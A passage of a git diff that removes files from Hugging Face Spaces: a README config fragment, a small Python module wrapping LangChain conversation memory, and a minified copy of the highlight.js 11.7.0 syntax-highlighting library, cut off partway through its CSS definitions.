🐨 -colorFrom: gray -colorTo: blue -sdk: streamlit -sdk_version: 1.27.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/momegas/megabots/megabots/memory.py b/spaces/momegas/megabots/megabots/memory.py deleted file mode 100644 index a54ed06aa4694eaca138b8b73540d43a57a39b62..0000000000000000000000000000000000000000 --- a/spaces/momegas/megabots/megabots/memory.py +++ /dev/null @@ -1,45 +0,0 @@ -from langchain.memory import ConversationBufferMemory, ConversationBufferWindowMemory - - -class ConversationBuffer: - def __init__(self): - self.memory = ConversationBufferMemory(input_key="question") - - -class ConversationBufferWindow: - def __init__(self, k: int): - self.k: int = k - self.memory = ConversationBufferWindowMemory(k=self.k, input_key="question") - - -SUPPORTED_MEMORY = { - "conversation-buffer": { - "impl": ConversationBuffer, - "default": {}, - }, - "conversation-buffer-window": { - "impl": ConversationBufferWindow, - "default": {"k": 3}, - }, -} - - -Memory = type("Memory", (ConversationBuffer, ConversationBufferWindow), {}) - - -def memory( - name: str = "conversation-buffer-window", - k: int | None = None, -) -> Memory: - if name is None: - raise RuntimeError("Impossible to instantiate memory without a name.") - - if name not in SUPPORTED_MEMORY: - raise ValueError(f"Memory {name} is not supported.") - - cl = SUPPORTED_MEMORY[name]["impl"] - - if name == "conversation-buffer-window": - return cl(k=k or SUPPORTED_MEMORY[name]["default"]["k"]) - - return SUPPORTED_MEMORY[name]["impl"]() diff --git a/spaces/monra/freegpt-webui/client/js/highlight.min.js b/spaces/monra/freegpt-webui/client/js/highlight.min.js deleted file mode 100644 index d410b45b38119606525a0a7c0c60c428c5ee6eb7..0000000000000000000000000000000000000000 --- a/spaces/monra/freegpt-webui/client/js/highlight.min.js +++ /dev/null @@ -1 +0,0 @@ -var hljs=function(){"use strict";var e={exports:{}};function n(e){return e instanceof Map?e.clear=e.delete=e.set=()=>{throw Error("map is read-only")}:e instanceof Set&&(e.add=e.clear=e.delete=()=>{throw Error("set is read-only")}),Object.freeze(e),Object.getOwnPropertyNames(e).forEach(t=>{var a=e[t];"object"!=typeof a||Object.isFrozen(a)||n(a)}),e}e.exports=n,e.exports.default=n;class t{constructor(e){void 0===e.data&&(e.data={}),this.data=e.data,this.isMatchIgnored=!1}ignoreMatch(){this.isMatchIgnored=!0}}function a(e){return e.replace(/&/g,"&").replace(//g,">").replace(/"/g,""").replace(/'/g,"'")}function i(e,...n){let t=Object.create(null);for(let a in e)t[a]=e[a];return n.forEach(e=>{for(let n in e)t[n]=e[n]}),t}let r=e=>!!e.scope||e.sublanguage&&e.language;class s{constructor(e,n){this.buffer="",this.classPrefix=n.classPrefix,e.walk(this)}addText(e){this.buffer+=a(e)}openNode(e){if(!r(e))return;let n="";n=e.sublanguage?"language-"+e.language:((e,{prefix:n})=>{if(e.includes(".")){let t=e.split(".");return[`${n}${t.shift()}`,...t.map((e,n)=>`${e}${"_".repeat(n+1)}`),].join(" ")}return`${n}${e}`})(e.scope,{prefix:this.classPrefix}),this.span(n)}closeNode(e){r(e)&&(this.buffer+="")}value(){return this.buffer}span(e){this.buffer+=``}}let l=(e={})=>{let n={children:[]};return Object.assign(n,e),n};class o{constructor(){this.rootNode=l(),this.stack=[this.rootNode]}get top(){return this.stack[this.stack.length-1]}get root(){return this.rootNode}add(e){this.top.children.push(e)}openNode(e){let n=l({scope:e});this.add(n),this.stack.push(n)}closeNode(){if(this.stack.length>1)return this.stack.pop()}closeAllNodes(){for(;this.closeNode(););}toJSON(){return JSON.stringify(this.rootNode,null,4)}walk(e){return this.constructor._walk(e,this.rootNode)}static _walk(e,n){return"string"==typeof n?e.addText(n):n.children&&(e.openNode(n),n.children.forEach(n=>this._walk(e,n)),e.closeNode(n)),e}static _collapse(e){"string"!=typeof e&&e.children&&(e.children.every(e=>"string"==typeof e)?e.children=[e.children.join("")]:e.children.forEach(e=>{o._collapse(e)}))}}class c extends o{constructor(e){super(),this.options=e}addKeyword(e,n){""!==e&&(this.openNode(n),this.addText(e),this.closeNode())}addText(e){""!==e&&this.add(e)}addSublanguage(e,n){let t=e.root;t.sublanguage=!0,t.language=n,this.add(t)}toHTML(){return new s(this,this.options).value()}finalize(){return!0}}function d(e){return e?"string"==typeof e?e:e.source:null}function g(e){return m("(?=",e,")")}function u(e){return m("(?:",e,")*")}function b(e){return m("(?:",e,")?")}function m(...e){return e.map(e=>d(e)).join("")}function p(...e){let n=(e=>{let n=e[e.length-1];return"object"==typeof n&&n.constructor===Object?(e.splice(e.length-1,1),n):{}})(e);return"("+(n.capture?"":"?:")+e.map(e=>d(e)).join("|")+")"}function h(e){return RegExp(e.toString()+"|").exec("").length-1}let f=/\[(?:[^\\\]]|\\.)*\]|\(\??|\\([1-9][0-9]*)|\\./;function E(e,{joinWith:n}){let t=0;return e.map(e=>{t+=1;let n=t,a=d(e),i="";for(;a.length>0;){let r=f.exec(a);if(!r){i+=a;break}i+=a.substring(0,r.index),a=a.substring(r.index+r[0].length),"\\"===r[0][0]&&r[1]?i+="\\"+(Number(r[1])+n):(i+=r[0],"("===r[0]&&t++)}return i}).map(e=>`(${e})`).join(n)}let $="[a-zA-Z]\\w*",y="[a-zA-Z_]\\w*",N="\\b\\d+(\\.\\d+)?",w="(-?)(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)",v="\\b(0b[01]+)",x={begin:"\\\\[\\s\\S]",relevance:0},k=(e,n,t={})=>{let a=i({scope:"comment",begin:e,end:n,contains:[]},t);a.contains.push({scope:"doctag",begin:"[ ]*(?=(TODO|FIXME|NOTE|BUG|OPTIMIZE|HACK|XXX):)",end:/(TODO|FIXME|NOTE|BUG|OPTIMIZE|HACK|XXX):/,excludeBegin:!0,relevance:0});let r=p("I","a","is","so","us","to","at","if","in","it","on",/[A-Za-z]+['](d|ve|re|ll|t|s|n)/,/[A-Za-z]+[-][a-z]+/,/[A-Za-z][a-z]{2,}/);return a.contains.push({begin:m(/[ ]+/,"(",r,/[.]?[:]?([.][ ]|[ ])/,"){3}")}),a},M=k("//","$"),O=k("/\\*","\\*/"),S=k("#","$");var A=Object.freeze({__proto__:null,MATCH_NOTHING_RE:/\b\B/,IDENT_RE:$,UNDERSCORE_IDENT_RE:y,NUMBER_RE:N,C_NUMBER_RE:w,BINARY_NUMBER_RE:v,RE_STARTERS_RE:"!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|-|-=|/=|/|:|;|<<|<<=|<=|<|===|==|=|>>>=|>>=|>=|>>>|>>|>|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~",SHEBANG(e={}){let n=/^#![ ]*\//;return e.binary&&(e.begin=m(n,/.*\b/,e.binary,/\b.*/)),i({scope:"meta",begin:n,end:/$/,relevance:0,"on:begin"(e,n){0!==e.index&&n.ignoreMatch()}},e)},BACKSLASH_ESCAPE:x,APOS_STRING_MODE:{scope:"string",begin:"'",end:"'",illegal:"\\n",contains:[x]},QUOTE_STRING_MODE:{scope:"string",begin:'"',end:'"',illegal:"\\n",contains:[x]},PHRASAL_WORDS_MODE:{begin:/\b(a|an|the|are|I'm|isn't|don't|doesn't|won't|but|just|should|pretty|simply|enough|gonna|going|wtf|so|such|will|you|your|they|like|more)\b/},COMMENT:k,C_LINE_COMMENT_MODE:M,C_BLOCK_COMMENT_MODE:O,HASH_COMMENT_MODE:S,NUMBER_MODE:{scope:"number",begin:N,relevance:0},C_NUMBER_MODE:{scope:"number",begin:w,relevance:0},BINARY_NUMBER_MODE:{scope:"number",begin:v,relevance:0},REGEXP_MODE:{begin:/(?=\/[^/\n]*\/)/,contains:[{scope:"regexp",begin:/\//,end:/\/[gimuy]*/,illegal:/\n/,contains:[x,{begin:/\[/,end:/\]/,relevance:0,contains:[x]},]},]},TITLE_MODE:{scope:"title",begin:$,relevance:0},UNDERSCORE_TITLE_MODE:{scope:"title",begin:y,relevance:0},METHOD_GUARD:{begin:"\\.\\s*[a-zA-Z_]\\w*",relevance:0},END_SAME_AS_BEGIN:e=>Object.assign(e,{"on:begin"(e,n){n.data._beginMatch=e[1]},"on:end"(e,n){n.data._beginMatch!==e[1]&&n.ignoreMatch()}})});function C(e,n){"."===e.input[e.index-1]&&n.ignoreMatch()}function T(e,n){void 0!==e.className&&(e.scope=e.className,delete e.className)}function R(e,n){n&&e.beginKeywords&&(e.begin="\\b("+e.beginKeywords.split(" ").join("|")+")(?!\\.)(?=\\b|\\s)",e.__beforeBegin=C,e.keywords=e.keywords||e.beginKeywords,delete e.beginKeywords,void 0===e.relevance&&(e.relevance=0))}function D(e,n){Array.isArray(e.illegal)&&(e.illegal=p(...e.illegal))}function I(e,n){if(e.match){if(e.begin||e.end)throw Error("begin & end are not supported with match");e.begin=e.match,delete e.match}}function L(e,n){void 0===e.relevance&&(e.relevance=1)}let B=(e,n)=>{if(!e.beforeMatch)return;if(e.starts)throw Error("beforeMatch cannot be used with starts");let t=Object.assign({},e);Object.keys(e).forEach(n=>{delete e[n]}),e.keywords=t.keywords,e.begin=m(t.beforeMatch,g(t.begin)),e.starts={relevance:0,contains:[Object.assign(t,{endsParent:!0})]},e.relevance=0,delete t.beforeMatch},_=["of","and","for","in","not","or","if","then","parent","list","value",],z={},F=e=>{console.error(e)},U=(e,...n)=>{},P=(e,n)=>{z[`${e}/${n}`]||(console.log(`Deprecated as of ${e}. ${n}`),z[`${e}/${n}`]=!0)},j=Error();function K(e,n,{key:t}){let a=0,i=e[t],r={},s={};for(let l=1;l<=n.length;l++)s[l+a]=i[l],r[l+a]=!0,a+=h(n[l-1]);e[t]=s,e[t]._emit=r,e[t]._multi=!0}function q(e){var n;(n=e).scope&&"object"==typeof n.scope&&null!==n.scope&&(n.beginScope=n.scope,delete n.scope),"string"==typeof e.beginScope&&(e.beginScope={_wrap:e.beginScope}),"string"==typeof e.endScope&&(e.endScope={_wrap:e.endScope}),(e=>{if(Array.isArray(e.begin)){if(e.skip||e.excludeBegin||e.returnBegin)throw F("skip, excludeBegin, returnBegin not compatible with beginScope: {}"),j;if("object"!=typeof e.beginScope||null===e.beginScope)throw F("beginScope must be object"),j;K(e,e.begin,{key:"beginScope"}),e.begin=E(e.begin,{joinWith:""})}})(e),(e=>{if(Array.isArray(e.end)){if(e.skip||e.excludeEnd||e.returnEnd)throw F("skip, excludeEnd, returnEnd not compatible with endScope: {}"),j;if("object"!=typeof e.endScope||null===e.endScope)throw F("endScope must be object"),j;K(e,e.end,{key:"endScope"}),e.end=E(e.end,{joinWith:""})}})(e)}class H extends Error{constructor(e,n){super(e),this.name="HTMLInjectionError",this.html=n}}let Z=a,G=i,W=Symbol("nomatch");var Q=(n=>{let a=Object.create(null),r=Object.create(null),s=[],l=!0,o="Could not find the language '{}', did you forget to load/include a language module?",f={disableAutodetect:!0,name:"Plain text",contains:[]},$={ignoreUnescapedHTML:!1,throwUnescapedHTML:!1,noHighlightRe:/^(no-?highlight)$/i,languageDetectRe:/\blang(?:uage)?-([\w-]+)\b/i,classPrefix:"hljs-",cssSelector:"pre code",languages:null,__emitter:c};function y(e){return $.noHighlightRe.test(e)}function N(e,n,t){let a="",i="";"object"==typeof n?(a=e,t=n.ignoreIllegals,i=n.language):(P("10.7.0","highlight(lang, code, ...args) has been deprecated."),P("10.7.0","Please use highlight(code, options) instead.\nhttps://github.com/highlightjs/highlight.js/issues/2277"),i=e,a=n),void 0===t&&(t=!0);let r={code:a,language:i};z("before:highlight",r);let s=r.result?r.result:w(r.language,r.code,t);return s.code=r.code,z("after:highlight",s),s}function w(e,n,r,s){let c=Object.create(null);function g(){var e;if(!M.keywords)return void A.addText(C);let n=0;M.keywordPatternRe.lastIndex=0;let t=M.keywordPatternRe.exec(C),a="";for(;t;){a+=C.substring(n,t.index);let i=N.case_insensitive?t[0].toLowerCase():t[0],r=(e=i,M.keywords[e]);if(r){let[s,l]=r;if(A.addText(a),a="",c[i]=(c[i]||0)+1,c[i]<=7&&(z+=l),s.startsWith("_"))a+=t[0];else{let o=N.classNameAliases[s]||s;A.addKeyword(t[0],o)}}else a+=t[0];n=M.keywordPatternRe.lastIndex,t=M.keywordPatternRe.exec(C)}a+=C.substring(n),A.addText(a)}function u(){null!=M.subLanguage?(()=>{if(""===C)return;let e=null;if("string"==typeof M.subLanguage){if(!a[M.subLanguage])return void A.addText(C);e=w(M.subLanguage,C,!0,S[M.subLanguage]),S[M.subLanguage]=e._top}else e=v(C,M.subLanguage.length?M.subLanguage:null);M.relevance>0&&(z+=e.relevance),A.addSublanguage(e._emitter,e.language)})():g(),C=""}function b(e,n){let t=1,a=n.length-1;for(;t<=a;){if(!e._emit[t]){t++;continue}let i=N.classNameAliases[e[t]]||e[t],r=n[t];i?A.addKeyword(r,i):(C=r,g(),C=""),t++}}function m(e,n){return e.scope&&"string"==typeof e.scope&&A.openNode(N.classNameAliases[e.scope]||e.scope),e.beginScope&&(e.beginScope._wrap?(A.addKeyword(C,N.classNameAliases[e.beginScope._wrap]||e.beginScope._wrap),C=""):e.beginScope._multi&&(b(e.beginScope,n),C="")),M=Object.create(e,{parent:{value:M}})}function p(e){return 0===M.matcher.regexIndex?(C+=e[0],1):(j=!0,0)}let f={};function y(a,i){let s=i&&i[0];if(C+=a,null==s)return u(),0;if("begin"===f.type&&"end"===i.type&&f.index===i.index&&""===s){if(C+=n.slice(i.index,i.index+1),!l){let o=Error(`0 width match regex (${e})`);throw o.languageName=e,o.badRule=f.rule,o}return 1}if(f=i,"begin"===i.type)return(e=>{let n=e[0],a=e.rule,i=new t(a),r=[a.__beforeBegin,a["on:begin"]];for(let s of r)if(s&&(s(e,i),i.isMatchIgnored))return p(n);return a.skip?C+=n:(a.excludeBegin&&(C+=n),u(),a.returnBegin||a.excludeBegin||(C=n)),m(a,e),a.returnBegin?0:n.length})(i);if("illegal"===i.type&&!r){let c=Error('Illegal lexeme "'+s+'" for mode "'+(M.scope||"")+'"');throw c.mode=M,c}if("end"===i.type){let d=function e(a){let i=a[0],r=n.substring(a.index),s=function e(n,a,i){let r=((e,n)=>{let t=e&&e.exec(n);return t&&0===t.index})(n.endRe,i);if(r){if(n["on:end"]){let s=new t(n);n["on:end"](a,s),s.isMatchIgnored&&(r=!1)}if(r){for(;n.endsParent&&n.parent;)n=n.parent;return n}}if(n.endsWithParent)return e(n.parent,a,i)}(M,a,r);if(!s)return W;let l=M;M.endScope&&M.endScope._wrap?(u(),A.addKeyword(i,M.endScope._wrap)):M.endScope&&M.endScope._multi?(u(),b(M.endScope,a)):l.skip?C+=i:(l.returnEnd||l.excludeEnd||(C+=i),u(),l.excludeEnd&&(C=i));do M.scope&&A.closeNode(),M.skip||M.subLanguage||(z+=M.relevance),M=M.parent;while(M!==s.parent);return s.starts&&m(s.starts,a),l.returnEnd?0:i.length}(i);if(d!==W)return d}if("illegal"===i.type&&""===s)return 1;if(P>1e5&&P>3*i.index)throw Error("potential infinite loop, way more iterations than matches");return C+=s,s.length}let N=O(e);if(!N)throw F(o.replace("{}",e)),Error('Unknown language: "'+e+'"');let x=function e(n){function t(e,t){return RegExp(d(e),"m"+(n.case_insensitive?"i":"")+(n.unicodeRegex?"u":"")+(t?"g":""))}class a{constructor(){this.matchIndexes={},this.regexes=[],this.matchAt=1,this.position=0}addRule(e,n){n.position=this.position++,this.matchIndexes[this.matchAt]=n,this.regexes.push([n,e]),this.matchAt+=h(e)+1}compile(){0===this.regexes.length&&(this.exec=()=>null);let e=this.regexes.map(e=>e[1]);this.matcherRe=t(E(e,{joinWith:"|"}),!0),this.lastIndex=0}exec(e){this.matcherRe.lastIndex=this.lastIndex;let n=this.matcherRe.exec(e);if(!n)return null;let t=n.findIndex((e,n)=>n>0&&void 0!==e),a=this.matchIndexes[t];return n.splice(0,t),Object.assign(n,a)}}class r{constructor(){this.rules=[],this.multiRegexes=[],this.count=0,this.lastIndex=0,this.regexIndex=0}getMatcher(e){if(this.multiRegexes[e])return this.multiRegexes[e];let n=new a;return this.rules.slice(e).forEach(([e,t])=>n.addRule(e,t)),n.compile(),this.multiRegexes[e]=n,n}resumingScanAtSamePosition(){return 0!==this.regexIndex}considerAll(){this.regexIndex=0}addRule(e,n){this.rules.push([e,n]),"begin"===n.type&&this.count++}exec(e){let n=this.getMatcher(this.regexIndex);n.lastIndex=this.lastIndex;let t=n.exec(e);if(this.resumingScanAtSamePosition()){if(t&&t.index===this.lastIndex);else{let a=this.getMatcher(0);a.lastIndex=this.lastIndex+1,t=a.exec(e)}}return t&&(this.regexIndex+=t.position+1,this.regexIndex===this.count&&this.considerAll()),t}}if(n.compilerExtensions||(n.compilerExtensions=[]),n.contains&&n.contains.includes("self"))throw Error("ERR: contains `self` is not supported at the top-level of a language. See documentation.");return n.classNameAliases=i(n.classNameAliases||{}),function e(a,s){let l=a;if(a.isCompiled)return l;[T,I,q,B].forEach(e=>e(a,s)),n.compilerExtensions.forEach(e=>e(a,s)),a.__beforeBegin=null,[R,D,L].forEach(e=>e(a,s)),a.isCompiled=!0;let o=null;return"object"==typeof a.keywords&&a.keywords.$pattern&&(a.keywords=Object.assign({},a.keywords),o=a.keywords.$pattern,delete a.keywords.$pattern),o=o||/\w+/,a.keywords&&(a.keywords=function e(n,t,a="keyword"){let i=Object.create(null);return"string"==typeof n?r(a,n.split(" ")):Array.isArray(n)?r(a,n):Object.keys(n).forEach(a=>{Object.assign(i,e(n[a],t,a))}),i;function r(e,n){t&&(n=n.map(e=>e.toLowerCase())),n.forEach(n=>{var t,a,r;let s=n.split("|");i[s[0]]=[e,(t=s[0],a=s[1],a?Number(a):(r=t,_.includes(r.toLowerCase()))?0:1)]})}}(a.keywords,n.case_insensitive)),l.keywordPatternRe=t(o,!0),s&&(a.begin||(a.begin=/\B|\b/),l.beginRe=t(l.begin),a.end||a.endsWithParent||(a.end=/\B|\b/),a.end&&(l.endRe=t(l.end)),l.terminatorEnd=d(l.end)||"",a.endsWithParent&&s.terminatorEnd&&(l.terminatorEnd+=(a.end?"|":"")+s.terminatorEnd)),a.illegal&&(l.illegalRe=t(a.illegal)),a.contains||(a.contains=[]),a.contains=[].concat(...a.contains.map(e=>{var n;return(n="self"===e?a:e).variants&&!n.cachedVariants&&(n.cachedVariants=n.variants.map(e=>i(n,{variants:null},e))),n.cachedVariants?n.cachedVariants:!function e(n){return!!n&&(n.endsWithParent||e(n.starts))}(n)?Object.isFrozen(n)?i(n):n:i(n,{starts:n.starts?i(n.starts):null})})),a.contains.forEach(n=>{e(n,l)}),a.starts&&e(a.starts,s),l.matcher=(e=>{let n=new r;return e.contains.forEach(e=>n.addRule(e.begin,{rule:e,type:"begin"})),e.terminatorEnd&&n.addRule(e.terminatorEnd,{type:"end"}),e.illegal&&n.addRule(e.illegal,{type:"illegal"}),n})(l),l}(n)}(N),k="",M=s||x,S={},A=new $.__emitter($);(()=>{let e=[];for(let n=M;n!==N;n=n.parent)n.scope&&e.unshift(n.scope);e.forEach(e=>A.openNode(e))})();let C="",z=0,U=0,P=0,j=!1;try{for(M.matcher.considerAll();;){P++,j?j=!1:M.matcher.considerAll(),M.matcher.lastIndex=U;let K=M.matcher.exec(n);if(!K)break;let H=y(n.substring(U,K.index),K);U=K.index+H}return y(n.substring(U)),A.closeAllNodes(),A.finalize(),k=A.toHTML(),{language:e,value:k,relevance:z,illegal:!1,_emitter:A,_top:M}}catch(G){if(G.message&&G.message.includes("Illegal"))return{language:e,value:Z(n),illegal:!0,relevance:0,_illegalBy:{message:G.message,index:U,context:n.slice(U-100,U+100),mode:G.mode,resultSoFar:k},_emitter:A};if(l)return{language:e,value:Z(n),illegal:!1,relevance:0,errorRaised:G,_emitter:A,_top:M};throw G}}function v(e,n){n=n||$.languages||Object.keys(a);let t=(e=>{let n={value:Z(e),illegal:!1,relevance:0,_top:f,_emitter:new $.__emitter($)};return n._emitter.addText(e),n})(e),i=n.filter(O).filter(C).map(n=>w(n,e,!1));i.unshift(t);let r=i.sort((e,n)=>{if(e.relevance!==n.relevance)return n.relevance-e.relevance;if(e.language&&n.language){if(O(e.language).supersetOf===n.language)return 1;if(O(n.language).supersetOf===e.language)return -1}return 0}),[s,l]=r,o=s;return o.secondBest=l,o}function x(e){let n=null,t=(e=>{let n=e.className+" ";n+=e.parentNode?e.parentNode.className:"";let t=$.languageDetectRe.exec(n);if(t){let a=O(t[1]);return a||(U(o.replace("{}",t[1])),U("Falling back to no-highlight mode for this block.",e)),a?t[1]:"no-highlight"}return n.split(/\s+/).find(e=>y(e)||O(e))})(e);if(y(t))return;if(z("before:highlightElement",{el:e,language:t}),e.children.length>0&&($.ignoreUnescapedHTML||$.throwUnescapedHTML))throw new H("One of your code blocks includes unescaped HTML.",e.innerHTML);n=e;let a=n.textContent,i=t?N(a,{language:t,ignoreIllegals:!0}):v(a);e.innerHTML=i.value,((e,n,t)=>{let a=n&&r[n]||t;e.classList.add("hljs"),e.classList.add("language-"+a)})(e,t,i.language),e.result={language:i.language,re:i.relevance,relevance:i.relevance},i.secondBest&&(e.secondBest={language:i.secondBest.language,relevance:i.secondBest.relevance}),z("after:highlightElement",{el:e,result:i,text:a})}let k=!1;function M(){"loading"!==document.readyState?document.querySelectorAll($.cssSelector).forEach(x):k=!0}function O(e){return a[e=(e||"").toLowerCase()]||a[r[e]]}function S(e,{languageName:n}){"string"==typeof e&&(e=[e]),e.forEach(e=>{r[e.toLowerCase()]=n})}function C(e){let n=O(e);return n&&!n.disableAutodetect}function z(e,n){let t=e;s.forEach(e=>{e[t]&&e[t](n)})}for(let j in"undefined"!=typeof window&&window.addEventListener&&window.addEventListener("DOMContentLoaded",()=>{k&&M()},!1),Object.assign(n,{highlight:N,highlightAuto:v,highlightAll:M,highlightElement:x,highlightBlock:e=>(P("10.7.0","highlightBlock will be removed entirely in v12.0"),P("10.7.0","Please use highlightElement now."),x(e)),configure(e){$=G($,e)},initHighlighting(){M(),P("10.6.0","initHighlighting() deprecated. Use highlightAll() now.")},initHighlightingOnLoad(){M(),P("10.6.0","initHighlightingOnLoad() deprecated. Use highlightAll() now.")},registerLanguage(e,t){let i=null;try{i=t(n)}catch(r){if(F("Language definition for '{}' could not be registered.".replace("{}",e)),!l)throw r;F(r),i=f}i.name||(i.name=e),a[e]=i,i.rawDefinition=t.bind(null,n),i.aliases&&S(i.aliases,{languageName:e})},unregisterLanguage(e){for(let n of(delete a[e],Object.keys(r)))r[n]===e&&delete r[n]},listLanguages:()=>Object.keys(a),getLanguage:O,registerAliases:S,autoDetection:C,inherit:G,addPlugin(e){var n;(n=e)["before:highlightBlock"]&&!n["before:highlightElement"]&&(n["before:highlightElement"]=e=>{n["before:highlightBlock"](Object.assign({block:e.el},e))}),n["after:highlightBlock"]&&!n["after:highlightElement"]&&(n["after:highlightElement"]=e=>{n["after:highlightBlock"](Object.assign({block:e.el},e))}),s.push(e)}}),n.debugMode=()=>{l=!1},n.safeMode=()=>{l=!0},n.versionString="11.7.0",n.regex={concat:m,lookahead:g,either:p,optional:b,anyNumberOfTimes:u},A)"object"==typeof A[j]&&e.exports(A[j]);return Object.assign(n,A),n})({});let X=e=>({IMPORTANT:{scope:"meta",begin:"!important"},BLOCK_COMMENT:e.C_BLOCK_COMMENT_MODE,HEXCOLOR:{scope:"number",begin:/#(([0-9a-fA-F]{3,4})|(([0-9a-fA-F]{2}){3,4}))\b/},FUNCTION_DISPATCH:{className:"built_in",begin:/[\w-]+(?=\()/},ATTRIBUTE_SELECTOR_MODE:{scope:"selector-attr",begin:/\[/,end:/\]/,illegal:"$",contains:[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},CSS_NUMBER_MODE:{scope:"number",begin:e.NUMBER_RE+"(%|em|ex|ch|rem|vw|vh|vmin|vmax|cm|mm|in|pt|pc|px|deg|grad|rad|turn|s|ms|Hz|kHz|dpi|dpcm|dppx)?",relevance:0},CSS_VARIABLE:{className:"attr",begin:/--[A-Za-z][A-Za-z0-9_-]*/}}),V=["a","abbr","address","article","aside","audio","b","blockquote","body","button","canvas","caption","cite","code","dd","del","details","dfn","div","dl","dt","em","fieldset","figcaption","figure","footer","form","h1","h2","h3","h4","h5","h6","header","hgroup","html","i","iframe","img","input","ins","kbd","label","legend","li","main","mark","menu","nav","object","ol","p","q","quote","samp","section","span","strong","summary","sup","table","tbody","td","textarea","tfoot","th","thead","time","tr","ul","var","video",],J=["any-hover","any-pointer","aspect-ratio","color","color-gamut","color-index","device-aspect-ratio","device-height","device-width","display-mode","forced-colors","grid","height","hover","inverted-colors","monochrome","orientation","overflow-block","overflow-inline","pointer","prefers-color-scheme","prefers-contrast","prefers-reduced-motion","prefers-reduced-transparency","resolution","scan","scripting","update","width","min-width","max-width","min-height","max-height",],Y=["active","any-link","blank","checked","current","default","defined","dir","disabled","drop","empty","enabled","first","first-child","first-of-type","fullscreen","future","focus","focus-visible","focus-within","has","host","host-context","hover","indeterminate","in-range","invalid","is","lang","last-child","last-of-type","left","link","local-link","not","nth-child","nth-col","nth-last-child","nth-last-col","nth-last-of-type","nth-of-type","only-child","only-of-type","optional","out-of-range","past","placeholder-shown","read-only","read-write","required","right","root","scope","target","target-within","user-invalid","valid","visited","where",],ee=["after","backdrop","before","cue","cue-region","first-letter","first-line","grammar-error","marker","part","placeholder","selection","slotted","spelling-error",],en=["align-content","align-items","align-self","all","animation","animation-delay","animation-direction","animation-duration","animation-fill-mode","animation-iteration-count","animation-name","animation-play-state","animation-timing-function","backface-visibility","background","background-attachment","background-blend-mode","background-clip","background-color","background-image","background-origin","background-position","background-repeat","background-size","block-size","border","border-block","border-block-color","border-block-end","border-block-end-color","border-block-end-style","border-block-end-width","border-block-start","border-block-start-color","border-block-start-style","border-block-start-width","border-block-style","border-block-width","border-bottom","border-bottom-color","border-bottom-left-radius","border-bottom-right-radius","border-bottom-style","border-bottom-width","border-collapse","border-color","border-image","border-image-outset","border-image-repeat","border-image-slice","border-image-source","border-image-width","border-inline","border-inline-color","border-inline-end","border-inline-end-color","border-inline-end-style","border-inline-end-width","border-inline-start","border-inline-start-color","border-inline-start-style","border-inline-start-width","border-inline-style","border-inline-width","border-left","border-left-color","border-left-style","border-left-width","border-radius","border-right","border-right-color","border-right-style","border-right-width","border-spacing","border-style","border-top","border-top-color","border-top-left-radius","border-top-right-radius","border-top-style","border-top-width","border-width","bottom","box-decoration-break","box-shadow","box-sizing","break-after","break-before","break-inside","caption-side","caret-color","clear","clip","clip-path","clip-rule","color","column-count","column-fill","column-gap","column-rule","column-rule-color","column-rule-style","column-rule-width","column-span","column-width","columns","contain","content","content-visibility","counter-increment","counter-reset","cue","cue-after","cue-before","cursor","direction","display","empty-cells","filter","flex","flex-basis","flex-direction","flex-flow","flex-grow","flex-shrink","flex-wrap","float","flow","font","font-display","font-family","font-feature-settings","font-kerning","font-language-override","font-size","font-size-adjust","font-smoothing","font-stretch","font-style","font-synthesis","font-variant","font-variant-caps","font-variant-east-asian","font-variant-ligatures","font-variant-numeric","font-variant-position","font-variation-settings","font-weight","gap","glyph-orientation-vertical","grid","grid-area","grid-auto-columns","grid-auto-flow","grid-auto-rows","grid-column","grid-column-end","grid-column-start","grid-gap","grid-row","grid-row-end","grid-row-start","grid-template","grid-template-areas","grid-template-columns","grid-template-rows","hanging-punctuation","height","hyphens","icon","image-orientation","image-rendering","image-resolution","ime-mode","inline-size","isolation","justify-content","left","letter-spacing","line-break","line-height","list-style","list-style-image","list-style-position","list-style-type","margin","margin-block","margin-block-end","margin-block-start","margin-bottom","margin-inline","margin-inline-end","margin-inline-start","margin-left","margin-right","margin-top","marks","mask","mask-border","mask-border-mode","mask-border-outset","mask-border-repeat","mask-border-slice","mask-border-source","mask-border-width","mask-clip","mask-composite","mask-image","mask-mode","mask-origin","mask-position","mask-repeat","mask-size","mask-type","max-block-size","max-height","max-inline-size","max-width","min-block-size","min-height","min-inline-size","min-width","mix-blend-mode","nav-down","nav-index","nav-left","nav-right","nav-up","none","normal","object-fit","object-position","opacity","order","orphans","outline","outline-color","outline-offset","outline-style","outline-width","overflow","overflow-wrap","overflow-x","overflow-y","padding","padding-block","padding-block-end","padding-block-start","padding-bottom","padding-inline","padding-inline-end","padding-inline-start","padding-left","padding-right","padding-top","page-break-after","page-break-before","page-break-inside","pause","pause-after","pause-before","perspective","perspective-origin","pointer-events","position","quotes","resize","rest","rest-after","rest-before","right","row-gap","scroll-margin","scroll-margin-block","scroll-margin-block-end","scroll-margin-block-start","scroll-margin-bottom","scroll-margin-inline","scroll-margin-inline-end","scroll-margin-inline-start","scroll-margin-left","scroll-margin-right","scroll-margin-top","scroll-padding","scroll-padding-block","scroll-padding-block-end","scroll-padding-block-start","scroll-padding-bottom","scroll-padding-inline","scroll-padding-inline-end","scroll-padding-inline-start","scroll-padding-left","scroll-padding-right","scroll-padding-top","scroll-snap-align","scroll-snap-stop","scroll-snap-type","scrollbar-color","scrollbar-gutter","scrollbar-width","shape-image-threshold","shape-margin","shape-outside","speak","speak-as","src","tab-size","table-layout","text-align","text-align-all","text-align-last","text-combine-upright","text-decoration","text-decoration-color","text-decoration-line","text-decoration-style","text-emphasis","text-emphasis-color","text-emphasis-position","text-emphasis-style","text-indent","text-justify","text-orientation","text-overflow","text-rendering","text-shadow","text-transform","text-underline-position","top","transform","transform-box","transform-origin","transform-style","transition","transition-delay","transition-duration","transition-property","transition-timing-function","unicode-bidi","vertical-align","visibility","voice-balance","voice-duration","voice-family","voice-pitch","voice-range","voice-rate","voice-stress","voice-volume","white-space","widows","width","will-change","word-break","word-spacing","word-wrap","writing-mode","z-index",].reverse(),et=Y.concat(ee);var 